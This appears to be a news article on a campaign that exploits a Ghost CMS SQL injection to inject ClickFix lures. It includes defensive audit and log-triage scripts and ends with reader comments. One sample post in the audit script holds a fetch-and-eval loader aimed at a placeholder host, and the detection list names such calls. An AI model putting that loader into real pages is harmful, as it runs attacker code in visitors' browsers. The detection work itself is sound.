Ghost CMS SQL flaw enables ClickFix lures

A large-scale campaign is using a critical SQL injection flaw in Ghost CMS (CVE-2026-26980) to steal admin API keys, then inject malicious JavaScript that leads visitors to a ClickFix-style fake Cloudflare prompt and a Windows command designed to drop payloads
For the third time in two separate incident waves, defenders went looking for one kind of malicious script—and found a different one in its place.
XLab threat intelligence researchers, working at Chinese cybersecurity company Qianxin, say they tracked a large-scale campaign exploiting a critical SQL injection vulnerability in Ghost CMS to inject malicious JavaScript across compromised websites. The campaign triggered ClickFix attack flows, and the researchers confirmed impact on more than 700 domains, including university portals, AI/SaaS companies, media outlets, fintech firms, security sites, and personal blogs.
The institutions and brands called out in the investigation include Harvard University, Oxford University, Auburn University, and DuckDuckGo—names that underline how broad the reach has been. The attack focus wasn’t random either. It centered on Ghost CMS installations that weren’t running the security fix released shortly after the vulnerability details became actionable.
CVE-2026-26980 affects Ghost CMS versions 3.24.0 through 6.19.0. The vulnerability allows unauthenticated attackers to read arbitrary data from the website database, including the admin API keys. Those keys aren’t just credentials in name: they provide management access to users, articles, and themes, and they can be used to modify article pages.
After stealing the admin API keys, the attackers moved from data theft to direct, user-facing compromise. XLab describes an attack chain in which the stolen access is used to inject malicious JavaScript into articles. The first-stage JavaScript acts as a lightweight loader. It fetches second-stage code from the attacker’s infrastructure and runs what XLab characterizes as a cloaking script—one that fingerprints visitors to decide whether they qualify as targets.
Those who pass the verification are served a fake Cloudflare prompt that appears via an iframe placed on top of the article page. Inside that prompt sits the ClickFix lure. The page tells victims to prove they’re human by pasting a provided command into their Windows command prompt, a step the attacker uses to drop a payload on their systems.
XLab says multiple payloads were used in these attacks, including DLL loaders, JavaScript droppers, and an Electron-based malware sample named UtilifySetup.exe.
The campaign also shows how hard it can be to “clean and move on.” XLab observed at least two distinct activity clusters targeting vulnerable Ghost sites. In some cases, domains were re-infected with different scripts even after cleanup. In other cases, one actor appeared to remove another actor’s injected script—only to inject their own afterward.
The fix existed, but timing still left gaps. According to the researchers, the security update for CVE-2026-26980 was released on February 19 in Ghost CMS version 6.19.1. Even so, many sites failed to install it.
SentinelOne, publishing on February 27, detailed how CVE-2026-26980 was being exploited in attacks and how incidents can be detected. XLab’s observations complement that reporting by tracing the chain from stolen admin API keys to injected JavaScript, cloaking-based targeting, and the ClickFix lure that funnels victims into executing Windows commands.
The practical takeaway for Ghost CMS administrators is blunt. Upgrade to version 6.19.1 or later, then rotate all keys used previously, because those keys may already be exposed. XLab also provided indicators of compromise, including injected scripts, and the researchers say websites need a thorough review to locate and remove malicious code.
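The "thorough review" step can be started with a content audit rather than by reading every article by hand. The script below is an added example, not code from XLab, SentinelOne or the Ghost project. It assumes posts are loaded from a Ghost JSON export (`db[0].data.posts`) or the Admin API, where each post carries the `html`, `codeinjection_head` and `codeinjection_foot` fields, and it flags the traits the article describes: script tags pulling from hosts the site does not normally use, inline scripts that fetch and evaluate remote code, and iframes (the vehicle for the fake Cloudflare prompt). The sample posts, the `.invalid` hostnames, the trusted-host list and the inline-script patterns are constructed for the example; they are not XLab's published indicators.

```python
"""Audit Ghost post content for injected <script> and <iframe> elements.

Added example: not code from XLab, SentinelOne or the Ghost project.
Assumes posts come from a Ghost JSON export (db[0].data.posts) or the
Admin API, with the real fields ``html``, ``codeinjection_head`` and
``codeinjection_foot``. Sample posts, hostnames and heuristic patterns are
constructed, not published IoCs.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts this site legitimately loads scripts from (site-specific).
TRUSTED_SCRIPT_HOSTS = {"blog.example.edu", "cdn.jsdelivr.net"}

# Generic traits of a loader/cloaking stage as the article describes it:
# pulling remote code, building an overlay iframe, decoding obfuscated
# strings. Heuristic triggers chosen for this example, not published IoCs.
SUSPICIOUS_INLINE = (
    "fetch(", "XMLHttpRequest", "createElement('iframe')",
    'createElement("iframe")', "atob(", "eval(", "Function(",
)


class _Collector(HTMLParser):
    """Collects external script sources, suspicious inline scripts, iframes."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False
        self._script_buf = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            src = a.get("src")
            if src:
                host = urlparse(src).hostname or ""
                # Relative URLs have no host and are served by the site itself.
                if host and host not in TRUSTED_SCRIPT_HOSTS:
                    self.findings.append(("external-script", src))
            else:
                self._in_script = True
                self._script_buf = []
        elif tag == "iframe":
            # The fake Cloudflare prompt was delivered through an iframe laid
            # over the article, so every iframe in post content gets a look.
            self.findings.append(("iframe", a.get("src") or ""))

    def handle_data(self, data):
        if self._in_script:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            body = "".join(self._script_buf)
            hits = [p for p in SUSPICIOUS_INLINE if p in body]
            if hits:
                self.findings.append(("inline-script", ",".join(hits)))


def scan_fragment(html):
    """Return a list of (kind, detail) findings for one HTML fragment."""
    parser = _Collector()
    parser.feed(html)
    parser.close()
    return parser.findings


def scan_posts(posts):
    """Map post slug -> findings, covering body HTML and code-injection fields."""
    report = {}
    for post in posts:
        findings = []
        for field in ("html", "codeinjection_head", "codeinjection_foot"):
            findings.extend(scan_fragment(post.get(field) or ""))
        if findings:
            report[post["slug"]] = findings
    return report


# Constructed sample: one clean post, one carrying a loader in its body and a
# second-stage script in codeinjection_head. ".invalid" hosts are placeholders.
SAMPLE_POSTS = [
    {"slug": "welcome",
     "html": '<p>Hello</p><script src="https://cdn.jsdelivr.net/lib.js"></script>',
     "codeinjection_head": None, "codeinjection_foot": None},
    {"slug": "research-update",
     "html": ("<p>Text</p><script>fetch('https://loader.invalid/s.js')"
              ".then(r=>r.text()).then(t=>eval(t))</script>"),
     "codeinjection_head": '<script src="https://stage2.invalid/c.js"></script>',
     "codeinjection_foot": None},
]

if __name__ == "__main__":
    for slug, findings in scan_posts(SAMPLE_POSTS).items():
        print(slug)
        for kind, detail in findings:
            print(f"  {kind}: {detail}")
```

Run it against the full export and also against the site-wide code injection settings (`codeinjection_head`/`codeinjection_foot` in the settings table), which are another place a stolen admin key can plant a loader. Every hit is a review candidate, not a verdict: legitimate embeds use iframes too, so the value of the script is that it narrows hundreds of articles down to a short list.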
There’s also a paper trail to protect now, and to leverage later. XLab recommends website owners keep a 30-day record of admin API call logs to support a reliable retrospective investigation—especially important when attackers may have used stolen access to change content and deliver payloads long before anyone noticed the intrusion.
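Those retained admin API logs are only useful if someone can turn them into answers: which client wrote to which posts, from where, and when. The script below is an added example, not code from XLab, SentinelOne or Ghost. It assumes Ghost sits behind a reverse proxy writing the nginx/Apache "combined" access-log format and that Admin API calls use the `/ghost/api/admin/` prefix (or the older versioned `/ghost/api/vN/admin/` form). The log lines, RFC 5737 addresses, post ids and the known-editor IP list are constructed for the example.

```python
"""Triage Ghost Admin API write calls from reverse-proxy access logs.

Added example, not from XLab, SentinelOne or Ghost. Assumes Ghost sits behind
a proxy writing the nginx/Apache "combined" log format, and that Admin API
calls use the ``/ghost/api/admin/`` (or versioned ``/ghost/api/vN/admin/``)
prefix. Log lines, IPs, post ids and the known-source list are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime

# combined format: ip ident user [ts] "METHOD path PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Admin API resource plus optional 24-hex object id, e.g. .../admin/posts/<id>/
ADMIN_RE = re.compile(
    r"^/ghost/api/(?:v\d+/)?admin/(?P<resource>[a-z_]+)/(?:(?P<id>[0-9a-f]{24})/?)?"
)
WRITE_METHODS = {"POST", "PUT", "DELETE"}


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def summarize_admin_writes(lines):
    """Group successful Admin API writes by client IP.

    Returns {ip: {"writes", "resources", "post_ids", "user_agents", "first",
    "last"}}; list fields are sorted so the result is stable.
    """
    acc = defaultdict(lambda: {"writes": 0, "resources": set(), "post_ids": set(),
                               "user_agents": set(), "first": None, "last": None})
    for line in lines:
        rec = parse_line(line)
        if not rec or rec["method"] not in WRITE_METHODS or rec["status"] >= 400:
            continue
        am = ADMIN_RE.match(rec["path"])
        if not am:
            continue  # Content API reads and theme assets are out of scope
        entry = acc[rec["ip"]]
        entry["writes"] += 1
        entry["resources"].add(am.group("resource"))
        if am.group("resource") == "posts" and am.group("id"):
            entry["post_ids"].add(am.group("id"))
        entry["user_agents"].add(rec["ua"])
        entry["first"] = rec["ts"] if entry["first"] is None else min(entry["first"], rec["ts"])
        entry["last"] = rec["ts"] if entry["last"] is None else max(entry["last"], rec["ts"])
    return {ip: {**e, "resources": sorted(e["resources"]),
                 "post_ids": sorted(e["post_ids"]),
                 "user_agents": sorted(e["user_agents"])}
            for ip, e in acc.items()}


def flag_unexpected(summary, known_ips):
    """IPs that wrote through the Admin API but are not known editor sources."""
    return sorted(ip for ip in summary if ip not in known_ips)


# Constructed sample log (RFC 5737 addresses, placeholder ids): an editor saving
# from the Ghost admin UI, then a scripted client updating two posts, plus a
# Content API read on the last line that the triage ignores.
SAMPLE_LOG = [
    '198.51.100.7 - - [18/Feb/2026:09:02:11 +0000] "PUT /ghost/api/admin/posts/65c8a1b2c3d4e5f6a7b8c9d0/ HTTP/1.1" 200 4096 "https://blog.example.edu/ghost/" "Mozilla/5.0 (X11; Linux x86_64) Firefox/125.0"',
    '203.0.113.10 - - [20/Feb/2026:03:14:07 +0000] "GET /ghost/api/admin/posts/?limit=all HTTP/1.1" 200 88210 "-" "python-requests/2.31"',
    '203.0.113.10 - - [20/Feb/2026:03:14:09 +0000] "PUT /ghost/api/admin/posts/65c8a1b2c3d4e5f6a7b8c9d0/ HTTP/1.1" 200 5120 "-" "python-requests/2.31"',
    '203.0.113.10 - - [20/Feb/2026:03:14:10 +0000] "PUT /ghost/api/admin/posts/65c8a1b2c3d4e5f6a7b8c9d1/ HTTP/1.1" 200 5120 "-" "python-requests/2.31"',
    '192.0.2.5 - - [20/Feb/2026:03:20:00 +0000] "GET /ghost/api/content/posts/?key=REDACTED HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]
KNOWN_EDITOR_IPS = {"198.51.100.7"}  # assumption: office/VPN egress of real editors

if __name__ == "__main__":
    summary = summarize_admin_writes(SAMPLE_LOG)
    for ip in flag_unexpected(summary, KNOWN_EDITOR_IPS):
        e = summary[ip]
        print(f"{ip}: {e['writes']} writes, posts {e['post_ids']}, "
              f"agents {e['user_agents']}, {e['first'].isoformat()} .. {e['last'].isoformat()}")
```

The output of `flag_unexpected` is the starting point for the retrospective the article asks for: the flagged IP's `post_ids` are the articles to diff against a clean backup, and `first`/`last` bound the window in which visitors may have been served the lure. The proxy log cannot tell you which admin API key signed a request, so pair this with the key rotation the article already recommends and with whatever application-level logging the site has.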
Ghost CMS again? smh guess nothing is safe.
So they stole admin API keys and then tricked people with a fake Cloudflare prompt?? That sounds like phishing but through websites… I don’t even know what ClickFix is.
Wait, is this why my uni site keeps acting weird? Like I swear the HTML changed and then it wants you to ‘verify’ or whatever. Also Ghost is a blogging thing right? They really got into Harvard/Oxford portals from some CMS plugin flaw? Makes no sense.
I read half of it and it’s basically: SQL bug in Ghost -> steals keys -> adds JavaScript -> fake Cloudflare prompt -> Windows command to drop payloads. So if a website isn’t updated, it’s just letting hackers in… cool cool. Also why is DuckDuckGo on the list, I thought they were security obsessed. Feels like one of those ‘third time in two waves’ things where nobody learns until it hits everyone.